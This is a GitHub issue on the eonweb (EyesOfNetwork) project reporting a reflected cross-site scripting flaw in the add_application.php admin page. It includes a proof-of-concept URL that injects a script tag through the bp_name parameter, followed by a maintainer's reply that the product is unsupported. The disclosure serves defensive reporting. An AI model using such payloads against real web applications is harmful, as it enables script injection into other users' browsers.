EyesOfNetworkCommunity / eonweb

EyesOfNetwork web interface
8 stars 12 forks source link

Reflected XSS at /module/admin_bp/add_application.php #118

Open kukuxumushi opened 2 years ago

kukuxumushi commented 2 years ago

Hello, we found the reflected xss. Tested on latest version eonweb 5.3-11 image

POC: https://192.168.88.184/module/admin_bp/add_application.php?bp_name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

liberodark commented 2 years ago

Hello,

The EON solution is no longer supported, I invite you to switch to another solution.

Best Regards